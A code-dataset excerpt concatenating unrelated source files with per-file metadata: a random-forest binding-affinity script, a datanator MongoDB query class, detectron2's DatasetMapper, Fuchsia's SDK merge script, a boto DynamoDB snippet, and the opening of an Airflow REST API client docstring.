    X = np.hstack((one_hot, fps))
    # NOTE: the next line discards the hstack result, so only the one-hot
    # cluster features are used as X below
    X = one_hot
print(X.shape)
pKs = np.array(pKs)
# filter None
for seed in (111, 222, 333):
np.random.seed(seed)
N = len(codes)
perm = np.random.permutation(N)
train_idx = perm[:int(N*0.8)]
valid_idx = perm[int(N*0.8):int(N*0.9)]
test_idx = perm[int(N*0.9):]
train_X = X[train_idx]
test_X = X[test_idx]
train_pKs = pKs[train_idx]
test_pKs = pKs[test_idx]
clf = RandomForestRegressor(
n_estimators=10,
max_depth=15,
# min_samples_split=10,
min_samples_split=5,
min_samples_leaf=1,
random_state=0,
n_jobs=8,
)
clf.fit(train_X, train_pKs)
pred_pKs = clf.predict(test_X)
r2 = np.corrcoef(test_pKs, pred_pKs)[0,1] ** 2
print('seed {} r2: {}'.format(seed, r2))
| pdbbind/props_random_forest.py | 4,767 | A fingerprint + random forest model.
Try to generate independent and identically distributed figerprint as decoy.
already converted ligand.mol2 to ligand.pdb by babel fp = AllChem.GetMorganFingerprintAsBitVect(mol, 2, nBits=512) all cluster smaller than 5 will set as cluster 0 filter None min_samples_split=10, | 313 | en | 0.686599 |
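The getProp() descriptor vector can be sanity-checked in isolation on a small molecule using the same RDKit calls as above (ethanol as an arbitrary example):

from rdkit import Chem

mol = Chem.MolFromSmiles('CCO')  # ethanol
mw, logp, rotb, hbd, hba, q = getProp(mol)
print(f'MW={mw:.2f} logP={logp:.2f} rotb={rotb} HBD={hbd} HBA={hba} charge={q}')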
from datanator_query_python.util import mongo_util
from pymongo.collation import Collation, CollationStrength
class QueryXmdb:
def __init__(self, username=None, password=None, server=None, authSource='admin',
database='datanator', max_entries=float('inf'), verbose=True, collection_str='ecmdb',
readPreference='nearest', replicaSet=None):
self.mongo_manager = mongo_util.MongoUtil(MongoDB=server, username=username,
password=password, authSource=authSource, db=database,
readPreference=readPreference, replicaSet=replicaSet)
self.collation = Collation(locale='en', strength=CollationStrength.SECONDARY)
self.max_entries = max_entries
self.verbose = verbose
self.client, self.db, self.collection = self.mongo_manager.con_db(collection_str)
self.collection_str = collection_str
def get_all_concentrations(self, projection={'_id': 0, 'inchi': 1,
'inchikey': 1, 'smiles': 1, 'name': 1}):
"""Get all entries that have concentration values
Args:
projection (dict, optional): mongodb query projection. Defaults to {'_id': 0, 'inchi': 1,'inchikey': 1, 'smiles': 1, 'name': 1}.
Returns:
(list): all results that meet the constraint.
"""
result = []
query = {'concentrations': {'$ne': None} }
docs = self.collection.find(filter=query, projection=projection)
for doc in docs:
result.append(doc)
return result
def get_name_by_inchikey(self, inchikey):
"""Get metabolite's name by its inchikey
Args:
inchikey (:obj:`str`): inchi key of metabolite
Return:
(:obj:`str`): name of metabolite
"""
query = {'inchikey': inchikey}
projection = {'_id': 0, 'name': 1}
doc = self.collection.find_one(filter=query, projection=projection, collation=self.collation)
if doc is None:
return 'No metabolite found.'
else:
return doc['name']
def get_standard_ids_by_id(self, _id):
"""Get chebi_id, pubmed_id, and kegg_id from
database specific id.
Args:
_id (:obj:`str`): Database specific ID.
Return:
(:obj:`dict`): Dictionary containing the information.
"""
if self.collection_str == 'ecmdb':
db_id = 'm2m_id'
else:
db_id = 'ymdb_id'
query = {db_id: _id}
# projection = {'hmdb_id': 1, 'chebi_id': 1, 'kegg_id': 1, '_id': 0}
doc = self.collection.find_one(filter=query)
if doc is None:
return {}
else:
return doc | datanator_query_python/query/query_xmdb.py | 2,831 | Get all entries that have concentration values
Args:
projection (dict, optional): mongodb query projection. Defaults to {'_id': 0, 'inchi': 1,'inchikey': 1, 'smiles': 1, 'name': 1}.
Returns:
(list): all results that meet the constraint.
Get metabolite's name by its inchikey
Args:
inchikey (:obj:`str`): inchi key of metabolite
Return:
(:obj:`str`): name of metabolite
Get chebi_id, pubmed_id, and kegg_id from
database specific id.
Args:
_id (:obj:`str`): Database specific ID.
Return:
(:obj:`dict`): Dictionary containing the information.
projection = {'hmdb_id': 1, 'chebi_id': 1, 'kegg_id': 1, '_id': 0} | 639 | en | 0.539199 |
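A usage sketch with hypothetical connection details; the InChIKey shown is water's and serves only as an example query:

q = QueryXmdb(username='datanator_user', password='***', server='mongodb.example.org',
              database='datanator', collection_str='ecmdb')
print(q.get_name_by_inchikey('XLYOFNOQVPJJNP-UHFFFAOYSA-N'))
print(len(q.get_all_concentrations()))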
# Copyright (c) Facebook, Inc. and its affiliates.
import copy
import logging
import numpy as np
from typing import List, Optional, Union
import torch
from detectron2.config import configurable
from . import detection_utils as utils
from . import transforms as T
"""
This file contains the default mapping that's applied to "dataset dicts".
"""
__all__ = ["DatasetMapper"]
class DatasetMapper:
"""
A callable which takes a dataset dict in Detectron2 Dataset format,
and map it into a format used by the model.
This is the default callable to be used to map your dataset dict into training data.
You may need to follow it to implement your own one for customized logic,
such as a different way to read or transform images.
See :doc:`/tutorials/data_loading` for details.
The callable currently does the following:
1. Read the image from "file_name"
2. Applies cropping/geometric transforms to the image and annotations
3. Prepare data and annotations to Tensor and :class:`Instances`
"""
@configurable
def __init__(
self,
is_train: bool,
*,
augmentations: List[Union[T.Augmentation, T.Transform]],
image_format: str,
use_instance_mask: bool = False,
use_keypoint: bool = False,
instance_mask_format: str = "polygon",
keypoint_hflip_indices: Optional[np.ndarray] = None,
precomputed_proposal_topk: Optional[int] = None,
recompute_boxes: bool = False,
):
"""
NOTE: this interface is experimental.
Args:
is_train: whether it's used in training or inference
augmentations: a list of augmentations or deterministic transforms to apply
image_format: an image format supported by :func:`detection_utils.read_image`.
use_instance_mask: whether to process instance segmentation annotations, if available
use_keypoint: whether to process keypoint annotations if available
instance_mask_format: one of "polygon" or "bitmask". Process instance segmentation
masks into this format.
keypoint_hflip_indices: see :func:`detection_utils.create_keypoint_hflip_indices`
precomputed_proposal_topk: if given, will load pre-computed
proposals from dataset_dict and keep the top k proposals for each image.
recompute_boxes: whether to overwrite bounding box annotations
by computing tight bounding boxes from instance mask annotations.
"""
if recompute_boxes:
assert use_instance_mask, "recompute_boxes requires instance masks"
# fmt: off
self.is_train = is_train
self.augmentations = T.AugmentationList(augmentations)
self.image_format = image_format
self.use_instance_mask = use_instance_mask
self.instance_mask_format = instance_mask_format
self.use_keypoint = use_keypoint
self.keypoint_hflip_indices = keypoint_hflip_indices
self.proposal_topk = precomputed_proposal_topk
self.recompute_boxes = recompute_boxes
# fmt: on
logger = logging.getLogger(__name__)
mode = "training" if is_train else "inference"
logger.info(f"[DatasetMapper] Augmentations used in {mode}: {augmentations}")
@classmethod
def from_config(cls, cfg, is_train: bool = True):
augs = utils.build_augmentation(cfg, is_train)
if cfg.INPUT.CROP.ENABLED and is_train:
augs.insert(0, T.RandomCrop(cfg.INPUT.CROP.TYPE, cfg.INPUT.CROP.SIZE))
recompute_boxes = cfg.MODEL.MASK_ON
else:
recompute_boxes = False
ret = {
"is_train": is_train,
"augmentations": augs,
"image_format": cfg.INPUT.FORMAT,
"use_instance_mask": cfg.MODEL.MASK_ON,
"instance_mask_format": cfg.INPUT.MASK_FORMAT,
"use_keypoint": cfg.MODEL.KEYPOINT_ON,
"recompute_boxes": recompute_boxes,
}
if cfg.MODEL.KEYPOINT_ON:
ret["keypoint_hflip_indices"] = utils.create_keypoint_hflip_indices(cfg.DATASETS.TRAIN)
if cfg.MODEL.LOAD_PROPOSALS:
ret["precomputed_proposal_topk"] = (
cfg.DATASETS.PRECOMPUTED_PROPOSAL_TOPK_TRAIN
if is_train
else cfg.DATASETS.PRECOMPUTED_PROPOSAL_TOPK_TEST
)
return ret
def __call__(self, dataset_dict):
"""
Args:
dataset_dict (dict): Metadata of one image, in Detectron2 Dataset format.
Returns:
dict: a format that builtin models in detectron2 accept
"""
dataset_dict = copy.deepcopy(dataset_dict) # it will be modified by code below
# USER: Write your own image loading if it's not from a file
image = utils.read_image(dataset_dict["file_name"], format=self.image_format)
utils.check_image_size(dataset_dict, image)
# USER: Remove if you don't do semantic/panoptic segmentation.
if "sem_seg_file_name" in dataset_dict:
sem_seg_gt = utils.read_image(dataset_dict.pop("sem_seg_file_name"), "L").squeeze(2)
else:
sem_seg_gt = None
aug_input = T.AugInput(image, sem_seg=sem_seg_gt)
transforms = self.augmentations(aug_input)
image, sem_seg_gt = aug_input.image, aug_input.sem_seg
image_shape = image.shape[:2] # h, w
# Pytorch's dataloader is efficient on torch.Tensor due to shared-memory,
# but not efficient on large generic data structures due to the use of pickle & mp.Queue.
# Therefore it's important to use torch.Tensor.
dataset_dict["image"] = torch.as_tensor(np.ascontiguousarray(image.transpose(2, 0, 1)))
if sem_seg_gt is not None:
dataset_dict["sem_seg"] = torch.as_tensor(sem_seg_gt.astype("long"))
# USER: Remove if you don't use pre-computed proposals.
# Most users would not need this feature.
if self.proposal_topk is not None:
utils.transform_proposals(
dataset_dict, image_shape, transforms, proposal_topk=self.proposal_topk
)
if not self.is_train:
# USER: Modify this if you want to keep them for some reason.
# dataset_dict.pop("annotations", None)
dataset_dict.pop("sem_seg_file_name", None)
return dataset_dict
if "annotations" in dataset_dict:
# USER: Modify this if you want to keep them for some reason.
for anno in dataset_dict["annotations"]:
if not self.use_instance_mask:
anno.pop("segmentation", None)
if not self.use_keypoint:
anno.pop("keypoints", None)
# USER: Implement additional transformations if you have other types of data
annos = [
utils.transform_instance_annotations(
obj, transforms, image_shape, keypoint_hflip_indices=self.keypoint_hflip_indices
)
for obj in dataset_dict.pop("annotations")
if obj.get("iscrowd", 0) == 0
]
instances = utils.annotations_to_instances(
annos, image_shape, mask_format=self.instance_mask_format
)
# After transforms such as cropping are applied, the bounding box may no longer
# tightly bound the object. As an example, imagine a triangle object
# [(0,0), (2,0), (0,2)] cropped by a box [(1,0),(2,2)] (XYXY format). The tight
# bounding box of the cropped triangle should be [(1,0),(2,1)], which is not equal to
# the intersection of original bounding box and the cropping box.
if self.recompute_boxes:
instances.gt_boxes = instances.gt_masks.get_bounding_boxes()
dataset_dict["instances"] = utils.filter_empty_instances(instances)
return dataset_dict
| detectron2/data/dataset_mapper.py | 8,113 | A callable which takes a dataset dict in Detectron2 Dataset format,
and map it into a format used by the model.
This is the default callable to be used to map your dataset dict into training data.
You may need to follow it to implement your own one for customized logic,
such as a different way to read or transform images.
See :doc:`/tutorials/data_loading` for details.
The callable currently does the following:
1. Read the image from "file_name"
2. Applies cropping/geometric transforms to the image and annotations
3. Prepare data and annotations to Tensor and :class:`Instances`
Args:
dataset_dict (dict): Metadata of one image, in Detectron2 Dataset format.
Returns:
dict: a format that builtin models in detectron2 accept
NOTE: this interface is experimental.
Args:
is_train: whether it's used in training or inference
augmentations: a list of augmentations or deterministic transforms to apply
image_format: an image format supported by :func:`detection_utils.read_image`.
use_instance_mask: whether to process instance segmentation annotations, if available
use_keypoint: whether to process keypoint annotations if available
instance_mask_format: one of "polygon" or "bitmask". Process instance segmentation
masks into this format.
keypoint_hflip_indices: see :func:`detection_utils.create_keypoint_hflip_indices`
precomputed_proposal_topk: if given, will load pre-computed
proposals from dataset_dict and keep the top k proposals for each image.
recompute_boxes: whether to overwrite bounding box annotations
by computing tight bounding boxes from instance mask annotations.
Copyright (c) Facebook, Inc. and its affiliates. fmt: off fmt: on it will be modified by code below USER: Write your own image loading if it's not from a file USER: Remove if you don't do semantic/panoptic segmentation. h, w Pytorch's dataloader is efficient on torch.Tensor due to shared-memory, but not efficient on large generic data structures due to the use of pickle & mp.Queue. Therefore it's important to use torch.Tensor. USER: Remove if you don't use pre-computed proposals. Most users would not need this feature. USER: Modify this if you want to keep them for some reason. dataset_dict.pop("annotations", None) USER: Modify this if you want to keep them for some reason. USER: Implement additional transformations if you have other types of data After transforms such as cropping are applied, the bounding box may no longer tightly bound the object. As an example, imagine a triangle object [(0,0), (2,0), (0,2)] cropped by a box [(1,0),(2,2)] (XYXY format). The tight bounding box of the cropped triangle should be [(1,0),(2,1)], which is not equal to the intersection of original bounding box and the cropping box. | 2,789 | en | 0.84747 |
#!/usr/bin/env python3.8
# Copyright 2018 The Fuchsia Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import argparse
import contextlib
import errno
import json
import os
import shutil
import sys
import tarfile
import tempfile
from functools import total_ordering
@total_ordering
class Part(object):
def __init__(self, json):
self.meta = json['meta']
self.type = json['type']
def __lt__(self, other):
return self.meta < other.meta and self.type < other.type
def __eq__(self, other):
return (
isinstance(other, self.__class__) and self.meta == other.meta and
self.type == other.type)
def __ne__(self, other):
return not self.__eq__(other)
def __hash__(self):
return hash((self.meta, self.type))
@contextlib.contextmanager
def _open_archive(archive, directory):
'''Manages a directory in which an existing SDK is laid out.'''
if directory:
yield directory
elif archive:
temp_dir = tempfile.mkdtemp(prefix='fuchsia-merger')
# Extract the tarball into the temporary directory.
# This is vastly more efficient than accessing files one by one via
# the tarfile API.
with tarfile.open(archive) as archive_file:
archive_file.extractall(temp_dir)
try:
yield temp_dir
finally:
shutil.rmtree(temp_dir, ignore_errors=True)
else:
raise Exception('Error: archive or directory must be set')
@contextlib.contextmanager
def _open_output(archive, directory):
'''Manages the output of this script.'''
if directory:
# Remove any existing output.
shutil.rmtree(directory, ignore_errors=True)
yield directory
elif archive:
temp_dir = tempfile.mkdtemp(prefix='fuchsia-merger')
try:
yield temp_dir
# Write the archive file.
with tarfile.open(archive, "w:gz") as archive_file:
archive_file.add(temp_dir, arcname='')
finally:
shutil.rmtree(temp_dir, ignore_errors=True)
else:
raise Exception('Error: archive or directory must be set')
def _get_manifest(sdk_dir):
'''Returns the set of elements in the given SDK.'''
with open(os.path.join(sdk_dir, 'meta', 'manifest.json'), 'r') as manifest:
return json.load(manifest)
def _get_meta(element, sdk_dir):
'''Returns the contents of the given element's manifest in a given SDK.'''
with open(os.path.join(sdk_dir, element), 'r') as meta:
return json.load(meta)
def _get_type(element):
'''Returns the SDK element type.'''
# For versioned SDK elements, the type is inside the data field.
if 'schema_id' in element:
return element['data']['type']
return element['type']
def _get_files(element_meta):
'''Extracts the files associated with the given element.
Returns a 2-tuple containing:
- the set of arch-independent files;
- the sets of arch-dependent files, indexed by architecture.
'''
type = _get_type(element_meta)
common_files = set()
arch_files = {}
if type == 'cc_prebuilt_library':
common_files.update(element_meta['headers'])
for arch, binaries in element_meta['binaries'].items():
contents = set()
contents.add(binaries['link'])
if 'dist' in binaries:
contents.add(binaries['dist'])
if 'debug' in binaries:
contents.add(binaries['debug'])
arch_files[arch] = contents
elif type == 'cc_source_library':
common_files.update(element_meta['headers'])
common_files.update(element_meta['sources'])
elif type == 'dart_library':
common_files.update(element_meta['sources'])
elif type == 'fidl_library':
common_files.update(element_meta['sources'])
elif type in ['host_tool', 'companion_host_tool']:
if 'files' in element_meta:
common_files.update(element_meta['files'])
if 'target_files' in element_meta:
arch_files.update(element_meta['target_files'])
elif type == 'loadable_module':
common_files.update(element_meta['resources'])
arch_files.update(element_meta['binaries'])
elif type == 'sysroot':
for arch, version in element_meta['versions'].items():
contents = set()
contents.update(version['headers'])
contents.update(version['link_libs'])
contents.update(version['dist_libs'])
contents.update(version['debug_libs'])
arch_files[arch] = contents
elif type == 'documentation':
common_files.update(element_meta['docs'])
elif type in ('config', 'license', 'component_manifest'):
common_files.update(element_meta['data'])
    elif type in ('version_history',):
# These types are pure metadata.
pass
elif type == 'bind_library':
common_files.update(element_meta['sources'])
else:
raise Exception('Unknown element type: ' + type)
return (common_files, arch_files)
def _ensure_directory(path):
'''Ensures that the directory hierarchy of the given path exists.'''
target_dir = os.path.dirname(path)
try:
os.makedirs(target_dir)
except OSError as exception:
if exception.errno == errno.EEXIST and os.path.isdir(target_dir):
pass
else:
raise
def _copy_file(file, source_dir, dest_dir):
'''Copies a file to a given path, taking care of creating directories if
needed.
'''
source = os.path.join(source_dir, file)
destination = os.path.join(dest_dir, file)
_ensure_directory(destination)
shutil.copy2(source, destination)
def _copy_files(files, source_dir, dest_dir):
'''Copies a set of files to a given directory.'''
for file in files:
_copy_file(file, source_dir, dest_dir)
def _copy_identical_files(
set_one, source_dir_one, set_two, source_dir_two, dest_dir):
'''Verifies that two sets of files are absolutely identical and then copies
them to the output directory.
'''
if set_one != set_two:
return False
# Not verifying that the contents of the files are the same, as builds are
# not exactly stable at the moment.
_copy_files(set_one, source_dir_one, dest_dir)
return True
def _copy_element(element, source_dir, dest_dir):
'''Copy an entire SDK element to a given directory.'''
meta = _get_meta(element, source_dir)
common_files, arch_files = _get_files(meta)
files = common_files
for more_files in arch_files.values():
files.update(more_files)
_copy_files(files, source_dir, dest_dir)
# Copy the metadata file as well.
_copy_file(element, source_dir, dest_dir)
def _write_meta(element, source_dir_one, source_dir_two, dest_dir):
'''Writes a meta file for the given element, resulting from the merge of the
meta files for that element in the two given SDK directories.
'''
meta_one = _get_meta(element, source_dir_one)
meta_two = _get_meta(element, source_dir_two)
# TODO(fxbug.dev/5362): verify that the common parts of the metadata files are in
# fact identical.
type = _get_type(meta_one)
meta = {}
if type in ('cc_prebuilt_library', 'loadable_module'):
meta = meta_one
meta['binaries'].update(meta_two['binaries'])
elif type == 'sysroot':
meta = meta_one
meta['versions'].update(meta_two['versions'])
elif type in ['host_tool', 'companion_host_tool']:
meta = meta_one
if not 'target_files' in meta:
meta['target_files'] = {}
if 'target_files' in meta_two:
meta['target_files'].update(meta_two['target_files'])
elif type in ('cc_source_library', 'dart_library', 'fidl_library',
'documentation', 'device_profile', 'config', 'license',
'component_manifest', 'bind_library', 'version_history'):
# These elements are arch-independent, the metadata does not need any
# update.
meta = meta_one
else:
raise Exception('Unknown element type: ' + type)
meta_path = os.path.join(dest_dir, element)
_ensure_directory(meta_path)
with open(meta_path, 'w') as meta_file:
json.dump(
meta, meta_file, indent=2, sort_keys=True, separators=(',', ': '))
return True
def _has_host_content(parts):
'''Returns true if the given list of SDK parts contains an element with
content built for a host.
'''
return 'host_tool' in [part.type for part in parts]
def _write_manifest(source_dir_one, source_dir_two, dest_dir):
'''Writes a manifest file resulting from the merge of the manifest files for
the two given SDK directories.
'''
manifest_one = _get_manifest(source_dir_one)
manifest_two = _get_manifest(source_dir_two)
parts_one = set([Part(p) for p in manifest_one['parts']])
parts_two = set([Part(p) for p in manifest_two['parts']])
manifest = {'arch': {}}
# Schema version.
if manifest_one['schema_version'] != manifest_two['schema_version']:
print('Error: mismatching schema version')
return False
manifest['schema_version'] = manifest_one['schema_version']
# Host architecture.
host_archs = set()
if _has_host_content(parts_one):
host_archs.add(manifest_one['arch']['host'])
if _has_host_content(parts_two):
host_archs.add(manifest_two['arch']['host'])
if not host_archs:
# The archives do not have any host content. The architecture is not
# meaningful in that case but is still needed: just pick one.
host_archs.add(manifest_one['arch']['host'])
if len(host_archs) != 1:
print(
'Error: mismatching host architecture: %s' % ', '.join(host_archs))
return False
manifest['arch']['host'] = list(host_archs)[0]
# Id.
if manifest_one['id'] != manifest_two['id']:
print('Error: mismatching id')
return False
manifest['id'] = manifest_one['id']
# Root.
if manifest_one['root'] != manifest_two['root']:
print('Error: mismatching root')
return False
manifest['root'] = manifest_one['root']
# Target architectures.
manifest['arch']['target'] = sorted(
set(manifest_one['arch']['target']) |
set(manifest_two['arch']['target']))
# Parts.
manifest['parts'] = [vars(p) for p in sorted(parts_one | parts_two)]
manifest_path = os.path.join(dest_dir, 'meta', 'manifest.json')
_ensure_directory(manifest_path)
with open(manifest_path, 'w') as manifest_file:
json.dump(
manifest,
manifest_file,
indent=2,
sort_keys=True,
separators=(',', ': '))
return True
def main():
parser = argparse.ArgumentParser(
description=('Merges the contents of two SDKs'))
first_group = parser.add_mutually_exclusive_group(required=True)
first_group.add_argument(
'--first-archive',
help='Path to the first SDK - as an archive',
default='')
first_group.add_argument(
'--first-directory',
help='Path to the first SDK - as a directory',
default='')
second_group = parser.add_mutually_exclusive_group(required=True)
second_group.add_argument(
'--second-archive',
help='Path to the second SDK - as an archive',
default='')
second_group.add_argument(
'--second-directory',
help='Path to the second SDK - as a directory',
default='')
output_group = parser.add_mutually_exclusive_group(required=True)
output_group.add_argument(
'--output-archive',
help='Path to the merged SDK - as an archive',
default='')
output_group.add_argument(
'--output-directory',
help='Path to the merged SDK - as a directory',
default='')
args = parser.parse_args()
has_errors = False
with _open_archive(args.first_archive, args.first_directory) as first_dir, \
_open_archive(args.second_archive, args.second_directory) as second_dir, \
_open_output(args.output_archive, args.output_directory) as out_dir:
first_elements = set(
[Part(p) for p in _get_manifest(first_dir)['parts']])
second_elements = set(
[Part(p) for p in _get_manifest(second_dir)['parts']])
common_elements = first_elements & second_elements
# Copy elements that appear in a single SDK.
for element in sorted(first_elements - common_elements):
_copy_element(element.meta, first_dir, out_dir)
for element in (second_elements - common_elements):
_copy_element(element.meta, second_dir, out_dir)
# Verify and merge elements which are common to both SDKs.
for raw_element in sorted(common_elements):
element = raw_element.meta
first_meta = _get_meta(element, first_dir)
second_meta = _get_meta(element, second_dir)
first_common, first_arch = _get_files(first_meta)
second_common, second_arch = _get_files(second_meta)
# Common files should not vary.
if not _copy_identical_files(first_common, first_dir, second_common,
second_dir, out_dir):
print('Error: different common files for %s' % (element))
has_errors = True
continue
# Arch-dependent files need to be merged in the metadata.
all_arches = set(first_arch.keys()) | set(second_arch.keys())
for arch in all_arches:
if arch in first_arch and arch in second_arch:
if not _copy_identical_files(first_arch[arch], first_dir,
second_arch[arch], second_dir,
out_dir):
print(
'Error: different %s files for %s' %
(arch, element))
has_errors = True
continue
elif arch in first_arch:
_copy_files(first_arch[arch], first_dir, out_dir)
elif arch in second_arch:
_copy_files(second_arch[arch], second_dir, out_dir)
if not _write_meta(element, first_dir, second_dir, out_dir):
print('Error: unable to merge meta for %s' % (element))
has_errors = True
if not _write_manifest(first_dir, second_dir, out_dir):
print('Error: could not write manifest file')
has_errors = True
# TODO(fxbug.dev/5362): verify that metadata files are valid.
return 1 if has_errors else 0
if __name__ == '__main__':
sys.exit(main())
| scripts/sdk/merger/merge.py | 15,050 | Copy an entire SDK element to a given directory.
Copies a file to a given path, taking care of creating directories if
needed.
Copies a set of files to a given directory.
Verifies that two sets of files are absolutely identical and then copies
them to the output directory.
Ensures that the directory hierarchy of the given path exists.
Extracts the files associated with the given element.
Returns a 2-tuple containing:
- the set of arch-independent files;
- the sets of arch-dependent files, indexed by architecture.
Returns the set of elements in the given SDK.
Returns the contents of the given element's manifest in a given SDK.
Returns the SDK element type.
Returns true if the given list of SDK parts contains an element with
content built for a host.
Manages a directory in which an existing SDK is laid out.
Manages the output of this script.
Writes a manifest file resulting from the merge of the manifest files for
the two given SDK directories.
Writes a meta file for the given element, resulting from the merge of the
meta files for that element in the two given SDK directories.
!/usr/bin/env python3.8 Copyright 2018 The Fuchsia Authors. All rights reserved. Use of this source code is governed by a BSD-style license that can be found in the LICENSE file. Extract the tarball into the temporary directory. This is vastly more efficient than accessing files one by one via the tarfile API. Remove any existing output. Write the archive file. For versioned SDK elements, the type is inside the data field. These types are pure metadata. Not verifying that the contents of the files are the same, as builds are not exactly stable at the moment. Copy the metadata file as well. TODO(fxbug.dev/5362): verify that the common parts of the metadata files are in fact identical. These elements are arch-independent, the metadata does not need any update. Schema version. Host architecture. The archives do not have any host content. The architecture is not meaningful in that case but is still needed: just pick one. Id. Root. Target architectures. Parts. Copy elements that appear in a single SDK. Verify and merge elements which are common to both SDKs. Common files should not vary. Arch-dependent files need to be merged in the metadata. TODO(fxbug.dev/5362): verify that metadata files are valid. | 2,311 | en | 0.876273 |
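main() requires exactly one of the archive/directory flags for each of the two inputs and for the output. A sketch of driving the merger from another Python script with archived SDKs; all paths below are hypothetical placeholders.

```python
# Invoke the merger as a subprocess using the argparse flags defined in main().
import subprocess

subprocess.run(
    [
        "python3", "merge.py",
        "--first-archive", "sdk-x64.tar.gz",
        "--second-archive", "sdk-arm64.tar.gz",
        "--output-archive", "sdk-merged.tar.gz",
    ],
    check=True,  # main() exits non-zero when the merge reports errors
)
```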
import boto.dynamodb2
from boto.dynamodb2.fields import HashKey
from boto.dynamodb2.table import Table

# Connect to DynamoDB in us-west-2 using the boto2 "dynamodb2" API.
connection = boto.dynamodb2.connect_to_region('us-west-2')

# Create the table with a single hash key and explicit provisioned throughput.
users = Table.create('users', schema=[
    HashKey('username'),  # defaults to STRING data_type
], throughput={
    'read': 5,
    'write': 15,
}, connection=connection)

# Write a sample item into the newly created table.
users.put_item(data={"username": "user"})
| samplescripts/create_table.py | 400 | defaults to STRING data_type | 28 | te | 0.103459 |
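The snippet above uses boto (v2), which is in maintenance mode. For comparison, a sketch of the same table creation with boto3, the successor library; credentials are assumed to come from the usual environment or config-file mechanisms, and the region, table name, and throughput mirror the snippet above.

```python
# A boto3 sketch equivalent to the boto2 snippet above: one string hash key
# named "username", with the same provisioned throughput.
import boto3

dynamodb = boto3.resource("dynamodb", region_name="us-west-2")

users = dynamodb.create_table(
    TableName="users",
    KeySchema=[{"AttributeName": "username", "KeyType": "HASH"}],
    AttributeDefinitions=[{"AttributeName": "username", "AttributeType": "S"}],
    ProvisionedThroughput={"ReadCapacityUnits": 5, "WriteCapacityUnits": 15},
)
users.wait_until_exists()                  # block until the table is ACTIVE
users.put_item(Item={"username": "user"})  # write a sample item
```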
"""
Airflow API (Stable)
# Overview To facilitate management, Apache Airflow supports a range of REST API endpoints across its objects. This section provides an overview of the API design, methods, and supported use cases. Most of the endpoints accept `JSON` as input and return `JSON` responses. This means that you must usually add the following headers to your request: ``` Content-type: application/json Accept: application/json ``` ## Resources The term `resource` refers to a single type of object in the Airflow metadata. An API is broken up by its endpoint's corresponding resource. The name of a resource is typically plural and expressed in camelCase. Example: `dagRuns`. Resource names are used as part of endpoint URLs, as well as in API parameters and responses. ## CRUD Operations The platform supports **C**reate, **R**ead, **U**pdate, and **D**elete operations on most resources. You can review the standards for these operations and their standard parameters below. Some endpoints have special behavior as exceptions. ### Create To create a resource, you typically submit an HTTP `POST` request with the resource's required metadata in the request body. The response returns a `201 Created` response code upon success with the resource's metadata, including its internal `id`, in the response body. ### Read The HTTP `GET` request can be used to read a resource or to list a number of resources. A resource's `id` can be submitted in the request parameters to read a specific resource. The response usually returns a `200 OK` response code upon success, with the resource's metadata in the response body. If a `GET` request does not include a specific resource `id`, it is treated as a list request. The response usually returns a `200 OK` response code upon success, with an object containing a list of resources' metadata in the response body. When reading resources, some common query parameters are usually available. e.g.: ``` v1/connections?limit=25&offset=25 ``` |Query Parameter|Type|Description| |---------------|----|-----------| |limit|integer|Maximum number of objects to fetch. Usually 25 by default| |offset|integer|Offset after which to start returning objects. For use with limit query parameter.| ### Update Updating a resource requires the resource `id`, and is typically done using an HTTP `PATCH` request, with the fields to modify in the request body. The response usually returns a `200 OK` response code upon success, with information about the modified resource in the response body. ### Delete Deleting a resource requires the resource `id` and is typically executing via an HTTP `DELETE` request. The response usually returns a `204 No Content` response code upon success. ## Conventions - Resource names are plural and expressed in camelCase. - Names are consistent between URL parameter name and field name. - Field names are in snake_case. ```json { \"name\": \"string\", \"slots\": 0, \"occupied_slots\": 0, \"used_slots\": 0, \"queued_slots\": 0, \"open_slots\": 0 } ``` ### Update Mask Update mask is available as a query parameter in patch endpoints. It is used to notify the API which fields you want to update. Using `update_mask` makes it easier to update objects by helping the server know which fields to update in an object instead of updating all fields. The update request ignores any fields that aren't specified in the field mask, leaving them with their current values. 
Example: ``` resource = request.get('/resource/my-id').json() resource['my_field'] = 'new-value' request.patch('/resource/my-id?update_mask=my_field', data=json.dumps(resource)) ``` ## Versioning and Endpoint Lifecycle - API versioning is not synchronized to specific releases of the Apache Airflow. - APIs are designed to be backward compatible. - Any changes to the API will first go through a deprecation phase. # Summary of Changes | Airflow version | Description | |-|-| | v2.0 | Initial release | | v2.0.2 | Added /plugins endpoint | | v2.1 | New providers endpoint | # Trying the API You can use a third party airflow_client.client, such as [curl](https://curl.haxx.se/), [HTTPie](https://httpie.org/), [Postman](https://www.postman.com/) or [the Insomnia rest airflow_client.client](https://insomnia.rest/) to test the Apache Airflow API. Note that you will need to pass credentials data. For e.g., here is how to pause a DAG with [curl](https://curl.haxx.se/), when basic authorization is used: ```bash curl -X PATCH 'https://example.com/api/v1/dags/{dag_id}?update_mask=is_paused' \\ -H 'Content-Type: application/json' \\ --user \"username:password\" \\ -d '{ \"is_paused\": true }' ``` Using a graphical tool such as [Postman](https://www.postman.com/) or [Insomnia](https://insomnia.rest/), it is possible to import the API specifications directly: 1. Download the API specification by clicking the **Download** button at top of this document 2. Import the JSON specification in the graphical tool of your choice. - In *Postman*, you can click the **import** button at the top - With *Insomnia*, you can just drag-and-drop the file on the UI Note that with *Postman*, you can also generate code snippets by selecting a request and clicking on the **Code** button. ## Enabling CORS [Cross-origin resource sharing (CORS)](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS) is a browser security feature that restricts HTTP requests that are initiated from scripts running in the browser. For details on enabling/configuring CORS, see [Enabling CORS](https://airflow.apache.org/docs/apache-airflow/stable/security/api.html). # Authentication To be able to meet the requirements of many organizations, Airflow supports many authentication methods, and it is even possible to add your own method. If you want to check which auth backend is currently set, you can use `airflow config get-value api auth_backend` command as in the example below. ```bash $ airflow config get-value api auth_backend airflow.api.auth.backend.basic_auth ``` The default is to deny all requests. For details on configuring the authentication, see [API Authorization](https://airflow.apache.org/docs/apache-airflow/stable/security/api.html). # Errors We follow the error response format proposed in [RFC 7807](https://tools.ietf.org/html/rfc7807) also known as Problem Details for HTTP APIs. As with our normal API responses, your airflow_client.client must be prepared to gracefully handle additional members of the response. ## Unauthenticated This indicates that the request has not been applied because it lacks valid authentication credentials for the target resource. Please check that you have valid credentials. ## PermissionDenied This response means that the server understood the request but refuses to authorize it because it lacks sufficient rights to the resource. It happens when you do not have the necessary permission to execute the action you performed. You need to get the appropriate permissions in other to resolve this error. 
